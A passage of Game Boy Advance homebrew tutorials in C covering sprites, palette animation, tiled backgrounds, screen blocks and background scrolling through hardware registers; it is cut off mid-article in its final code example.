The most obvious thing to do is to draw a different sprite depending on what button is currently pressed. This is pretty easy since we laid our sprites out sequentially in memory:

inline uint16 RGB15(uint32 red, uint32 green, uint32 blue)
{
    return red | (green<<5) | (blue<<10);
}

void DrawSprite(uint16 key_code)
{
    const uint16 keys[] = {KEY_A, KEY_B, KEY_SELECT,
                          KEY_START, KEY_RIGHT, KEY_LEFT,
                          KEY_UP, KEY_DOWN, KEY_L, KEY_R};

    int idx = 0;
    for (int i = 0; i < 10; ++i)
    {
        if (keys[i] == key_code)
        {
            idx = i;
            break;
        }
    }

    volatile ObjectAttributes *spriteAttribs = &MEM_OAM[0];
    spriteAttribs->attr0 = 0x602F;
    spriteAttribs->attr1 = 0xC04F;
    spriteAttribs->attr2 = idx * 32 * 2;

}

And then move the sprite off screen when we don’t want to draw any text at all:

void ClearSprite()
{
    volatile ObjectAttributes *spriteAttribs = &MEM_OAM[0];
    spriteAttribs->attr0 = 0x60AF;
}

Animating Palette Information

In addition to drawing a sprite, let’s animate our background. You’ll notice that the background I created earlier was just a single colour. Since the colours live in palette memory, we can change the colour of the background just by changing the first colour in the background palette.

To make things simpler, I just added the code to change the background colour to the DrawSprite function from above. There are certainly better / cleaner ways to do this, but for a quick and dirty example, I think the following will do.

void DrawSprite(uint16 key_code)
{
    ...
    const uint16 bgCols[] = {RGB15(16,0,0), RGB15(0,16,0), RGB15(0,0,16),
                            RGB15(16,16,0),RGB15(16,16,16),RGB15(31,16,0),
                            RGB15(31,0,16),RGB15(16,0,31),RGB15(16,31,0),
                            RGB15(31,0,31)};
    MEM_BG_PALETTE[0] = bgCols[idx];
}

Finally, I added a single line to the ClearSprite function:

void ClearSprite()
{
    ...
    MEM_BG_PALETTE[0] = 0;
}

You can do a lot of interesting things by modifying palettes directly, like having parts of sprites flash when hit, or having different enemies use the same sprite but use different colours (like the old Legend of Zelda games did with red / blue enemies). What I’ve done here is the simplest possible example of doing something like that, but it’s effective nonetheless.

Putting It All Together

If you’re still with me, the hard part is over, and all that’s left is to write out the main function for our program, and make sure all the necessary #defines are there for things to work together.

//previous code from article omitted for brevity

#define VIDEOMODE_0    0x0000
#define ENABLE_OBJECTS 0x1000
#define MAPPINGMODE_1D 0x0040
#define BACKGROUND_0   0x0100
#define REG_DISPLAYCONTROL     *((volatile uint16*)(0x04000000))
#define REG_VCOUNT             *((volatile uint16*)(0x04000006))

inline void vsync()
{
  while (REG_VCOUNT >= 160);
  while (REG_VCOUNT < 160);
}

int main()
{
    CreateBackground();
    LoadTileData();

    REG_DISPLAYCONTROL =  VIDEOMODE_0 | ENABLE_OBJECTS | BACKGROUND_0 | MAPPINGMODE_1D;
    key_poll();
    ClearSprite();

    while(1)
    {
        vsync();
        key_poll();

        const uint16 keys[] = {KEY_A, KEY_B, KEY_SELECT,
                                KEY_START, KEY_RIGHT, KEY_LEFT,
                                KEY_UP, KEY_DOWN, KEY_L, KEY_R};
        ClearSprite();
        for (int i = 0; i < 10; ++i)
        {
            if (getKeyState(keys[i]))
            {
                DrawSprite(keys[i]);
            }
        }
    }

    return 0;
}

If you want to grab a fully put-together, runnable version of the code, you can find it here. I’m going to omit it from this page because all the code is already available above, and I think a github repo is a far better delivery mechanism for that much code than pasting it here.

This has the disadvantage of only showing one key press at a time (and prioritizing some keys over others), but I’m ok with that, I just wanted a fun example program to show off input handling, and to provide more examples of how to use stuff we’ve done in articles past. I suppose modifying the above to show all the buttons that are currently pressed instead of one is left as an exercise to the reader? ;)

Conclusion

That’s it for this week! I’m kind of excited that we’ve covered enough ground that I can throw up some code and refer to previous articles instead of having to explain every line, but if that ended up being unclear today make sure to let me know via reddit or twitter, or wherever so I can adjust future articles.

Finally, as much fun as pumping these articles out every week is, I’m going to slow down a bit and do one every two weeks, so that I have more time for some other hobby projects. We’ve covered enough ground now that there’s no reason to wait around for me to post more before starting to build the GBA game of your dreams though, so get to it!

And as always, if you want to say hello, or ask questions, or point out mistakes I’ve made, I’m most easily reached on Twitter.

GBA By Example - Drawing and Moving Backgrounds

2017-04-11T00:00:00+00:00

(Note: This is Part 3 of my GBA by Example series. A list of my other GBA tutorials can be found here)

It’s Tuesday, which means it’s the arbitrary day of the week I chose to post GBA stuff!

Last week we got a sprite on the screen and moving around in a tiled video mode, but it still left our screen looking a little bit bare. This week we’re going to rectify that, and figure out how to work with Backgrounds! You can make really great looking stuff with backgrounds, or you can do what I did, and make something that looks like this:

This is two backgrounds (one gradient, and one checkerboard), overlapping one another, and moving in opposite directions. Snazzy eh? Today we’re going to cover the absolute minimum you need to know to make something like that.

To kick things off, let’s take a look at what a background actually is on the GBA:

Introducing Backgrounds

Like Sprites, Backgrounds are rectangular collections of tiles. Unlike Sprites, they can be really, really big (relatively speaking). If you recall from last week, the largest sprite we can make is 64x64 pixels. Backgrounds can be up to 1024x1024 if we want them to be. Since we only have 96k of VRAM on the GBA (and 32k of that is for Sprites), it stands to reason that to fit all our background data in, they look a bit different from Sprites in memory.

Just like with Sprites, all colours in a Background come from a Palette, which is a collection of up to 256 different colours, each stored as a 16 bit unsigned integer. Colours on the GBA are stored with 5 bits per channel, with the highest bit ignored, like this:

inline uint16 MakeCol(uint32 red, uint32 green, uint32 blue)
{
    return red | (green<<5) | (blue<<10);
}

In code, a Palette might be defined like so:

const unsigned short bgPal[4] __attribute__((aligned(4)))=
{
    0x4DA0,0x0000,0xFFFF,0x001F
};
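To see how the 5-bits-per-channel layout plays out on real values, here is a sketch that unpacks a palette entry back into its channels. The helper names (packColour, redOf, greenOf, blueOf) are invented for this example. Unlike MakeCol above, packColour clamps each channel to 31, since a larger value would otherwise spill into the neighbouring channel's bits.

```c
#include <assert.h>
#include <stdint.h>

/* Channels are 5 bits wide, so 31 is the largest valid value. */
static uint32_t clamp5(uint32_t v) { return v > 31u ? 31u : v; }

/* Like MakeCol, but out-of-range channels are clamped first. */
uint16_t packColour(uint32_t red, uint32_t green, uint32_t blue)
{
    return (uint16_t)(clamp5(red) | (clamp5(green) << 5) | (clamp5(blue) << 10));
}

uint32_t redOf(uint16_t colour)   { return colour & 31u; }
uint32_t greenOf(uint16_t colour) { return (colour >> 5) & 31u; }
uint32_t blueOf(uint16_t colour)  { return (colour >> 10) & 31u; }

void demoColour(void)
{
    /* first entry of the example palette: 0x4DA0 */
    assert(redOf(0x4DA0) == 0);
    assert(greenOf(0x4DA0) == 13);
    assert(blueOf(0x4DA0) == 19);
    assert(packColour(0, 13, 19) == 0x4DA0);

    /* last entry, 0x001F, is pure red */
    assert(redOf(0x001F) == 31 && greenOf(0x001F) == 0);

    /* 32 doesn't fit in 5 bits, so it is clamped to 31 */
    assert(packColour(32, 0, 0) == 0x001F);
}
```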

One thing that hasn’t been mentioned in previous articles is that pixels that use the colour at index 0 are treated as transparent, so you only see the index 0 colour if nothing else gets drawn on top of that pixel. This will be important for us today because we’re going to overlap two backgrounds on top of each other.

A Background’s tiles are the same as a Sprite’s: 8x8 grids of pixels, with each pixel storing an index into the palette array. Backgrounds use a separate colour palette from sprites, so you can use an entirely different set of colours for your backgrounds than you do for other stuff in your game. This palette memory, just like with sprites, is large enough to store 256 colours. Since we can only have 256 possible values, tiles store each pixel as an 8 bit index. Tiles are laid out row by row, from top to bottom.

In code, that might look like this:

const unsigned short bgTiles[64] __attribute__((aligned(4)))=
{
    0x0101,0x0202,0x0101,0x0202,0x0101,0x0202,0x0101,0x0202,
    ...
};

If you store your tile data in values larger than uint8s, like I did above, remember that the lowest byte in a value is the leftmost pixel.

All of that should be familiar to you if you read last week’s post, but unlike with Sprites, the order of the tiles doesn’t matter when we’re working with backgrounds. This is because backgrounds want to re-use tiles as much as possible. To accomplish this, backgrounds use a third data structure, called a Screen Block, which is a collection of indices into tile memory: One 16 bit value for every 8x8 tile that the background uses.

Screen Blocks are always 32x32 entries in size, and each entry represents an 8x8 tile, meaning that backgrounds are made up of one or more blocks of 256x256 pixels.

In code, a Screen Block might look something like this:

const unsigned short checkerBg[1024] =
{
    0x0001,0x0001,0x0001,0x0000,0x0000,0x0000,0x0000,0x0000,
    0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,
    0x0000,0x0000,0x000A,0x001D,0x0000,0x0000,0x0000,0x0000,
    0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,

    0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,
    0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,
    0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,
    0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,

    //continue for another 30 rows

As seen here, Screen Blocks are defined row by row, top to bottom, each value representing the index of a tile. When you’re working with 8bpp tiles, this is all there is to it. There’s more to think about in 4bpp mode, but since this is the first time we’re doing anything with backgrounds, let’s keep it simple and continue working in 8bpp mode.
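As a quick sketch of what "row by row, top to bottom" means in practice, the helper below maps a pixel position inside a single 256x256 Screen Block to the index of the entry that covers it. screenEntryIndex is a name made up for this example.

```c
#include <assert.h>

#define TILE_SIZE         8   /* tiles are 8x8 pixels */
#define BLOCK_WIDTH_TILES 32  /* a Screen Block is 32x32 entries */

/* Index into a Screen Block's 1024 entries for the tile covering
   pixel (pixelX, pixelY). Both coordinates must be in 0..255. */
int screenEntryIndex(int pixelX, int pixelY)
{
    int tileX = pixelX / TILE_SIZE;
    int tileY = pixelY / TILE_SIZE;
    return tileY * BLOCK_WIDTH_TILES + tileX;
}

void demoScreenEntryIndex(void)
{
    assert(screenEntryIndex(0, 0) == 0);         /* top left tile */
    assert(screenEntryIndex(8, 0) == 1);         /* one tile to the right */
    assert(screenEntryIndex(0, 8) == 32);        /* one tile down */
    assert(screenEntryIndex(255, 255) == 1023);  /* bottom right tile */

    /* the 0x000A entry in the listing above sits at index 18,
       so it covers pixels 144 to 151 of the first row of tiles */
    assert(screenEntryIndex(144, 0) == 18);
}
```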

The last thing to know is that we can only have between 0 and 4 backgrounds working at the same time. Yay hardware limitations!

This was a lot of theory, and I want to switch gears now and start to build some stuff, but just to recap:

A Background is a rectangular collection of 8x8 tiles
Tiles are stored as arrays of indices into palette memory
To decide which tile goes where, Backgrounds use Screen Blocks, which are 32x32 arrays of indices into tile memory
A Background consists of one or more Screen Blocks
We can use between 0 and 4 backgrounds at any given time

Alright, let’s start putting this into practice!

My Data:

Because Screen Blocks are so large, I’ve uploaded the data (including tiles and palette) that I’m going to use today to github instead of just including it here.

That gist contains all the information needed to get our first background (the checkerboard) onto the screen. We’ll generate the gradient background in code below.

Getting Data into VRAM

We know what our data is going to look like, but we haven’t yet covered where it’s going to go. Let’s start with Palette memory, since it’s going to be the most like what we’ve done before.

As mentioned above, Backgrounds use a different palette than Sprites, which naturally means that the background palette is located at a different place in memory:

#include "tiles.h"

#define MEM_BG_PALETTE    ((uint16*)(0x05000000))
#define MEM_OBJ_PALETTE   ((uint16*)(0x05000200))

void UploadPaletteMem()
{
    memcpy(MEM_BG_PALETTE, bgPal, bgPalLen);
}

Perfect, the palette data was easy! Next we need to get our tiles into memory. You may recall from last week that the data for sprite tiles starts at the fifth tile-block in tile memory. This is because the first 4 of those blocks are reserved for backgrounds. So let’s put our tile data into the first one:

typedef uint16 Tile[32];
typedef Tile TileBlock[256];

#define MEM_VRAM                ((volatile uint32*)0x6000000)
#define MEM_TILE                ((TileBlock*)0x6000000)

void UploadTileMem()
{
    memcpy(&MEM_TILE[0][0], bgTiles, bgTilesLen);
}

All of this is almost identical to last week, so let’s start doing something different and get our Screen Block data into memory. Screen blocks share memory with Tile memory. A Screen Block is 2048 bytes, which means that we can fit 8 of them into a single tile-block. It’s up to us to make sure that we don’t try to put a Screen Block and tile data into the same spot in memory.

If you’re using the example data, you’ll notice that we only have 2 tiles to upload into memory (a checkerboard tile, and a transparent tile), so it’s safe for us to just go 1 Screen Block away from the start of VRAM:

typedef uint16 ScreenBlock[1024];
#define MEM_SCREENBLOCKS        ((ScreenBlock*)0x6000000)

void UploadScreenBlock()
{
    //checkerBg is the ScreenBlock data from the gist
    memcpy(&MEM_SCREENBLOCKS[1], checkerBg, checkerBgLen);
}

That should about do it for uploading the data we have for our tiles, but I also mentioned that I generated the gradient background in code. Here’s the code for that:

inline uint16 MakeCol(uint32 red, uint32 green, uint32 blue)
{
    return red | (green<<5) | (blue<<10);
}

void GenerateGradient()
{
    //we've uploaded 4 colours to palette memory
    //so make sure we don't overwrite those
    for (uint16 i = 0; i < 32; i++)
    {
        *((uint16*)(MEM_BG_PALETTE+(4+i))) = MakeCol(i,i,i);
    }

    //every tile is 64 palette indices
    //we have 32 grayscale values from above
    uint8 tile[64];
    for (uint16 i = 0; i < 32; ++i)
    {
        for (int j = 0; j < 64; j++)
        {
            tile[j] = 4 + (i);
        }
        memcpy(MEM_TILE[1][i], tile, 64);
    }

    //generate 2 screen blocks,
    //each gray value getting two tiles of width
    for (int block = 0; block < 2; ++block)
    {
        uint16 screenBlock[1024];

        //screen block data is row by row, top to bottom
        for (uint16 i = 0; i < 32; ++i)
        {
            for (uint16 j = 0; j < 32; ++j)
            {
                //each block gets 16 colours, 2 tiles wide for each
                screenBlock[i * 32 + j] =  (j/2) + (block*16);
            }
        }
        memcpy(MEM_SCREENBLOCKS[block+2], &screenBlock[0], 2048);
    }
}

I was torn on whether or not to include this in the post, but I think it’s a good example of another way of working with all the types of memory we’re wrangling to get data on the screen. It also gives us an opportunity to work with a background that uses more than 1 Screen Block, since the gradient is 2 Screen Blocks wide.
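If the bit shuffling is the confusing part, this sketch isolates the two calculations the gradient code relies on: packing a 15 bit colour, and picking the tile index for a column of the map. It is a desktop-side illustration only. PackColour15 and GradientTileIndex are hypothetical names I made up here, and the range checks are an addition of mine that the original code doesn't have.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: pack three 5 bit channels (0-31) into one colour.
   Red sits in bits 0-4, green in bits 5-9, blue in bits 10-14. */
static uint16_t PackColour15(uint32_t red, uint32_t green, uint32_t blue)
{
    assert(red < 32 && green < 32 && blue < 32);
    return (uint16_t)(red | (green << 5) | (blue << 10));
}

/* Hypothetical helper: tile index used for a given column (0-31) of a given
   gradient screen block (0 or 1), mirroring the inner loop above. */
static uint16_t GradientTileIndex(uint32_t block, uint32_t column)
{
    assert(block < 2 && column < 32);
    return (uint16_t)(column / 2 + block * 16);
}
```

Pure red comes out as 0x001F and pure blue as 0x7C00, and the two screen blocks between them cover tile indices 0 through 31, one per gray value.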

If the above code is unclear, that’s ok! I don’t think it was particularly common to generate background data like this anyway. If you want to follow along, just copy and paste the above code and pretend we uploaded that data the same way we did the other data, since it has nothing to do with understanding how the GBA handles backgrounds.

Turning Things On

The hard part is officially over! All that’s left now is to tell the hardware to use the data we’re feeding it, and glue all the snippets we have together.

Let’s talk about our friend the display control register (0x04000000). In addition to doing things like setting a video mode or enabling objects, this register is also used to enable or disable backgrounds.

We get to work with up to four backgrounds at a time on the GBA, and you can enable them like so:

#define VIDEOMODE_0    0x0000
#define BACKGROUND_0   0x0100
#define BACKGROUND_1   0x0200
#define BACKGROUND_2   0x0400
#define BACKGROUND_3   0x0800

#define REG_DISPLAYCONTROL     *((volatile uint16*)(0x04000000))

int main()
{
    REG_DISPLAYCONTROL = VIDEOMODE_0 | BACKGROUND_0 | BACKGROUND_1;
    return 0;
}

We’re only going to use the first two backgrounds today, but you can turn on all four backgrounds, or only 1 and 3, or any other combination that you want to use.
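Since the four enable flags are just consecutive bits, you could also compute them instead of writing out a #define for each. This is only a sketch of that idea: BackgroundEnableBit is a name I made up, and it assumes backgrounds are numbered 0 to 3 with background 0 on bit 8.

```c
#include <assert.h>
#include <stdint.h>

#define VIDEOMODE_0  0x0000u

/* Hypothetical helper: enable flag for background n (0-3).
   Background 0 is bit 8, and each later background is one bit higher. */
static uint16_t BackgroundEnableBit(uint32_t n)
{
    assert(n < 4);
    return (uint16_t)(0x0100u << n);
}
```

Turning on "only 1 and 3" would then be VIDEOMODE_0 | BackgroundEnableBit(1) | BackgroundEnableBit(3).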

Also, we’re still in VideoMode_0. This is because it’s the easiest tiled mode to understand, and we (I) still don’t know enough to actually use any of the features in the other tiled modes.

If you’re in a bitmap mode, you need to enable Background 2 in order for anything to appear on the screen, but as far as I know, you can’t actually do anything with it, it’s just a flag needed to make bitmap modes work.

Defining Our Backgrounds

Just like with Sprites (err.. Objects that is), we need to set up a few values to define how the hardware should use our background data. Mercifully, backgrounds are actually much easier to work with than Sprites. They only need a single 16 bit value set.

Since there are only 4 backgrounds, these values live at constant memory locations:

#define REG_BG0_CONTROL        *((volatile uint16*)(0x04000008))
#define REG_BG1_CONTROL        *((volatile uint16*)(0x0400000A))
#define REG_BG2_CONTROL        *((volatile uint16*)(0x0400000C))
#define REG_BG3_CONTROL        *((volatile uint16*)(0x0400000E))

What each bit in these values means is as follows:

BG	0x FEDC BA98 7654 3210
FE	Size (defined below)
D	Ignored today (see Tonc for info)
CBA98	What Screen Block to start at
7	Color mode: (1 for 8bpp, 0 for 4bpp)
6	Ignored today (see Tonc for info)
54	Nothing, empty bits
32	Tile Block to use
10	Z Depth

Just like with Sprites, the size bits above select a value from another table. For backgrounds, this table is as follows:

Bits	Size (in Tiles)
00	32x32
01	64x32
10	32x64
11	64x64

Using the above tables, if we wanted to define our first background (the checkerboard), as a 32x32 tile background which uses tiles starting at the first tile block, and uses the second Screen Block (since it’s offset from the start of VRAM to make space for tile memory), we would do the following:

//Size 00, Screen Block 1, Color Mode 1, Tile Block 0, Depth 0
//0000 0001 1000 0000

REG_BG0_CONTROL = 0x0180;

Notice that we want our Z Depth to be 0 as well. The higher this value, the farther back in the drawing order a background is, so a BG at depth 0 will draw on top of backgrounds with any higher values. Since our checkerboard background has the transparent pixels in it, we want it to be drawn on top of whatever will fill in those transparent pixels.
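If you’d rather not count bits by hand, the table translates fairly directly into shifts. Here’s a minimal sketch of that, meant to be run on a desktop to check your values. MakeBgControl is a hypothetical helper of my own (it isn’t in the project code), and it leaves the two "ignored today" bits at 0.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: build a background control value from the fields in
   the table above. Bits D and 6 (ignored in this post) are left at 0. */
static uint16_t MakeBgControl(uint32_t size, uint32_t screenBlock,
                              uint32_t is8bpp, uint32_t tileBlock,
                              uint32_t depth)
{
    assert(size < 4 && screenBlock < 32 && is8bpp < 2);
    assert(tileBlock < 4 && depth < 4);
    return (uint16_t)((size << 14) | (screenBlock << 8) | (is8bpp << 7) |
                      (tileBlock << 2) | depth);
}
```

Calling MakeBgControl(0, 1, 1, 0, 0) gives the same 0x0180 we wrote by hand for the checkerboard.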

If we put all this together (leaving out the code for the second background), we get:

#include <string.h>
#include "tiles.h"

typedef unsigned char      uint8;
typedef unsigned short     uint16;
typedef unsigned int       uint32;

typedef uint16 ScreenBlock[1024];
typedef uint16 Tile[32];
typedef Tile TileBlock[256];

#define VIDEOMODE_0    0x0000
#define BACKGROUND_0   0x0100

#define REG_DISPLAYCONTROL     *((volatile uint16*)(0x04000000))
#define REG_BG0_CONTROL        *((volatile uint16*)(0x04000008))

#define MEM_VRAM                ((volatile uint32*)0x6000000)
#define MEM_TILE                ((TileBlock*)0x6000000)
#define MEM_SCREENBLOCKS        ((ScreenBlock*)0x6000000)

#define MEM_BG_PALETTE          ((uint16*)(0x05000000))

int main()
{
    //load data
    memcpy(MEM_BG_PALETTE, bgPal, bgPalLen );
    memcpy(&MEM_TILE[0][0], bgTiles, bgTilesLen);
    memcpy(&MEM_SCREENBLOCKS[1], checkerBg, checkerBgLen);

    REG_BG0_CONTROL = 0x0180;// 0000 0001 1000 0000;
    REG_DISPLAYCONTROL =  VIDEOMODE_0 | BACKGROUND_0;

    while(1)
    {
    }
    return 0;
}

And if you run that, you should see:

Which is excellent! We officially have our first background on the screen. Let’s add our second one now. Remember that we used 2 Screen Blocks to hold all the values for this background, and we want them laid out horizontally, so we’ll have a 64x32 background. We want it to be at priority 1, so that it draws behind the checkerboard, and we want it to use the data we populated with the gradient generating code above.

// Size 01, Screen Block 2, Color Mode 1, Tile Block 1, Priority 1
// 0100 0010 1000 0101
REG_BG1_CONTROL = 0x4285;

If we add the above line, and the required #defines and gradient code to what we have, we get the following (I’ve omitted GenerateGradient() function body for brevity). I promise after this to not paste any more large code blocks into the article :)

#include <string.h>
#include "tiles.h"
#include "bg.h"

typedef unsigned char      uint8;
typedef unsigned short     uint16;
typedef unsigned int       uint32;

typedef uint16 ScreenBlock[1024];
typedef uint16 Tile[32];
typedef Tile TileBlock[256];

#define VIDEOMODE_0    0x0000
#define BACKGROUND_0   0x0100
#define BACKGROUND_1   0x0200

#define REG_DISPLAYCONTROL     *((volatile uint16*)(0x04000000))
#define REG_BG0_CONTROL        *((volatile uint16*)(0x04000008))
#define REG_BG1_CONTROL        *((volatile uint16*)(0x0400000A))

#define MEM_VRAM                ((volatile uint32*)0x6000000)
#define MEM_TILE                ((TileBlock*)0x6000000)
#define MEM_SCREENBLOCKS        ((ScreenBlock*)0x6000000)

#define MEM_BG_PALETTE          ((uint16*)(0x05000000))
#define MEM_PALETTE             ((uint16*)(0x05000200))

static inline uint16 MakeCol(uint32 red, uint32 green, uint32 blue)
{
    return red | (green<<5) | (blue<<10);
}

void GenerateGradient();

int main()
{
    //load data
    memcpy(MEM_BG_PALETTE, bgPal, bgPalLen );
    memcpy(&MEM_TILE[0][0], bgTiles, bgTilesLen);
    memcpy(&MEM_SCREENBLOCKS[1], checkerBg, checkerBgLen);

    GenerateGradient();

    REG_BG0_CONTROL = 0x0180;// 0000 0001 1000 0000;
    REG_BG1_CONTROL = 0x4285; // 0100 0010 1000 0101
    REG_DISPLAYCONTROL =  VIDEOMODE_0 | BACKGROUND_0 | BACKGROUND_1;
    while(1)
    {
    }
    return 0;
}

If you compile and run the above (filling in the GenerateGradient function), you should end up with this:

Which is almost exactly what we wanted to end up with when we started! All that’s left is to add some movement, and this is pretty easy to do.

Moving Things Around

In truth, backgrounds don’t really move, your viewport moves over top of the background. This makes sense with 1 background, but it gets a bit abstract when you think about multiple backgrounds moving at once. In essence, all you have to keep in mind is that increasing the X value of the background scrolling register is going to move it to the left, because what you’re doing is actually moving where your screen is to the right. The same is true for the vertical scrolling register.

As you may have guessed from that explanation, each background on the GBA has two additional registers, one for X offset, and one for Y offset. All backgrounds will repeat infinitely as you scroll them, so you can keep incrementing these values at will, without worrying about resetting them when you get to the edge of a background image. These registers are defined as follows:

#define REG_BG0_SCROLL_H       *((volatile uint16*)(0x04000010))
#define REG_BG0_SCROLL_V       *((volatile uint16*)(0x04000012))
#define REG_BG1_SCROLL_H       *((volatile uint16*)(0x04000014))
#define REG_BG1_SCROLL_V       *((volatile uint16*)(0x04000016))
#define REG_BG2_SCROLL_H       *((volatile uint16*)(0x04000018))
#define REG_BG2_SCROLL_V       *((volatile uint16*)(0x0400001A))
#define REG_BG3_SCROLL_H       *((volatile uint16*)(0x0400001C))
#define REG_BG3_SCROLL_V       *((volatile uint16*)(0x0400001E))

These are pretty self explanatory: assign numbers to them to make the corresponding background move. The only weird part about them is that they are write-only, so you can never read the current value back, which also means you can’t simply increment a register in place. All you can do is write a new value to it.
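The usual way around a register you can’t read is to keep your own copy of the value and write that copy out whenever it changes. Here’s a rough sketch of that pattern. ScrollShadow and ScrollBy are hypothetical names of mine, and the register is passed in as a pointer so the same code can be pointed at an ordinary variable when you try it on a desktop.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical wrapper: keeps our own copy of a write-only scroll register. */
typedef struct ScrollShadow {
    volatile uint16_t *reg;   /* e.g. the address behind REG_BG0_SCROLL_H */
    int value;                /* the copy we are allowed to read */
} ScrollShadow;

/* Adjust the shadow copy, then write it out. The register is never read. */
static void ScrollBy(ScrollShadow *s, int delta)
{
    assert(s != 0 && s->reg != 0);
    s->value += delta;
    *s->reg = (uint16_t)s->value;
}
```

The scrolling loop further down does the same thing with plain int variables; wrapping it in a struct just keeps the copy and the register together.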

Using these registers, it’s trivial to modify our code from earlier to make things scroll. For brevity’s sake, I’m just going to show how to modify the while(1){} section from the above code, rather than paste the whole thing again:

int hScroll = 0;
int h2Scroll = 0;
while(1)
{
    vsync();

    REG_BG0_SCROLL_H = -hScroll;
    REG_BG1_SCROLL_H = h2Scroll;
    h2Scroll +=2;
    hScroll = h2Scroll/3;
}

This is pretty much what you’d expect: background 0 is being assigned a value that is decreasing, which means it should appear to be moving right on the screen (since our viewport is moving left), and vice versa with the gradient background. This matches up with the scroll directions we had at the top of the post. Which is perfect, because that means we’re done!

Conclusion

I suppose I should link you to some tools that can be used to create backgrounds, but I do so only grudgingly, because I don’t think they’re great. Tonc suggests Mappy and MapEd. To be fair, I haven’t written a tile mapping tool so I don’t really have much of a leg to stand on when criticizing these, but I found them rather fiddly to use, which is why I ended up just hand building some really simple ones for this post.

I’d love to hear about better tools for doing this sort of work. I think Tiled might be better, but I don’t know how well suited it is to GBA style stuff. In any case, I’d love to hear about what tools might be better on Twitter. See you next week!

GBA By Example - Drawing and Moving Sprites

2017-04-04T00:00:00+00:00

(Note: This is Part 2 of my GBA by Example series. A list of my other GBA tutorials can be found here)

Last week, we were working in video mode 3, which is one of the “bitmap” video modes. These modes are named so because they use the GBA’s 96K of video memory (VRAM) to store a representation of the screen as an array of colour values. If you want to draw to pixel (0,0), you simply set the first element in the screen buffer array to the colour you want, and when the hardware draws, it reads the value at that location, and draws it to the screen.

While some games did use the bitmap modes to do some pretty amazing stuff (like James Bond 007: NightFire and Stuntman), they were the exception, not the rule. Most GBA games that were released were purely 2D, and used what are called Tiled Video Modes, which provide hardware level optimizations for 2D drawing tasks.

So today I’m going to walk through the bare minimum needed to use one of these tiled video modes to draw (and move) a sprite across the screen, which might end up looking like this:

(Forgive the Programmer Art)

Let’s get started!

Introducing Tiled Video Modes

Tiled video modes are different from the bitmap modes because they don’t store large colour arrays in VRAM. Instead, VRAM is used to store collections of tiles (8x8 collections of colour values), and data about how to display these tiles. There are 3 different tiled video modes (mode 0 - mode 2), but I don’t know enough about the differences between them right now to make an informed choice about which one to use. Until that changes, I’m going to work in Mode 0 and kinda plug my ears and try not to think too hard about it:

#define REG_DISPLAYCONTROL     *((volatile uint16*)(0x04000000))

int main()
{
    REG_DISPLAYCONTROL = 0; //mode 0, no background enabled

    while(1){}
    return 0;
}

Since what we store in VRAM has changed since last week, it makes sense that there are a few new data structures that we’re going to have to understand in order to get anything useful into memory (and do anything interesting).

As mentioned, a Tile is an 8x8 collection of colour values (stored linearly, one row after the other), but these colour values are not the colours the sprite will actually use on screen. Instead, these values are used to look up the colour in a Palette, which is another data structure we’re going to have to wrangle today.

A Palette is a block of memory that contains colour values, plain and simple. An application gets 2 of these blocks of memory, one for backgrounds, and one for sprites. Each section is large enough to contain 256 colour values.

Tiles can take the form of 8bpp (bits per pixel), or 4bpp. 8bpp mode is pretty straightforward - we have 8 bits to play with, which means each value in our tile can be one of 256 possible values, which is exactly how many values we can store in a palette. In 4bpp mode, we get up to 16 possible values for each pixel, which means that we can only use a section of our palette memory for each sprite.

Because it sounds easier, and I promised that this article was the bare minimum we needed to draw a sprite, we’re going to use 8bpp today.

Finally, a Sprite is a rectangular collection of tiles, so when we format images to be used on the GBA, we need to break them up into 8x8 tiles, and a palette of colours that those tiles use, and then provide some data about which locations in Tile and Palette memory our sprite will use. It’s important to note that the GBA calls Sprites “Objects” (not the OOP kind). You can split hairs about this, but a GBA Object is a collection of tiles, arranged rectangularly, that move around the screen. Sounds like a Sprite to me.

I’m sure there are reasons why this isn’t true 100% of the time, but those reasons aren’t really important today.

So to wrap this section up:

A Palette is an array of 256 colour values
A Tile’s colour values are actually indices into Palette memory
A Sprite is a (theoretical) rectangular collection of tiles.
The hardware equivalent of a Sprite is called an Object

Hopefully that’s all relatively clear! Let’s start putting all of this together.

Working With Sprite Data

The first thing we need to do is to actually have some tile and colour data to use in our program.

For this section, I’m going to simply provide the data that we’re going to use. At the end of this post, I’ll link you to tools that you can use to make your own. To start with, let’s consider a really simple sprite, which consists of only a single tile, and 3 palette colours.

(Grid lines added to help differentiate pixels, not included in sprite)

Here’s what that sprite might look like in our program:

const unsigned int testTiles[16] __attribute__((aligned(4)))=
{
    0x00000000,0x00000000,
    0x00000001,0x00000000,
    0x00000000,0x00000000,
    0x00000000,0x00000000,
    0x00000000,0x00000000,
    0x00000000,0x00000000,
    0x02020102,0x02020202,
    0x00000000,0x00000000,
};

const unsigned int testPal[2] __attribute__((aligned(4)))=
{
    0x03E0001F,0x00007C00,
};

You can see that most of this is what we would expect: the testTiles data traverses each row in order from top to bottom, with each pixel getting 8 bits (2 hex digits) of data, so each 32 bit value represents 4 pixels. The lowest bits represent the leftmost pixels, which makes sense logically, even if it makes things harder to read when you’re looking at hex values.

The palette data is also as we would expect, containing the three colours used in our sprite, represented as 15 bit colours, with 2 colours per 32 bit value.
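If you want to convince yourself of that layout, here’s a small sketch that pulls individual pixels and colours back out of the example data. It runs fine on a desktop since it only does arithmetic on the values. TilePixel8bpp and PaletteEntry are hypothetical helpers I wrote for this illustration, and the arrays are repeated (without the alignment attribute) so the snippet compiles on its own.

```c
#include <assert.h>
#include <stdint.h>

/* The single-tile example data from above, repeated so this compiles alone. */
static const uint32_t testTiles[16] = {
    0x00000000, 0x00000000,
    0x00000001, 0x00000000,
    0x00000000, 0x00000000,
    0x00000000, 0x00000000,
    0x00000000, 0x00000000,
    0x00000000, 0x00000000,
    0x02020102, 0x02020202,
    0x00000000, 0x00000000,
};
static const uint32_t testPal[2] = { 0x03E0001F, 0x00007C00 };

/* Hypothetical helper: palette index of pixel (x, y) in an 8bpp tile.
   Each row is two 32 bit words; the lowest byte is the leftmost pixel. */
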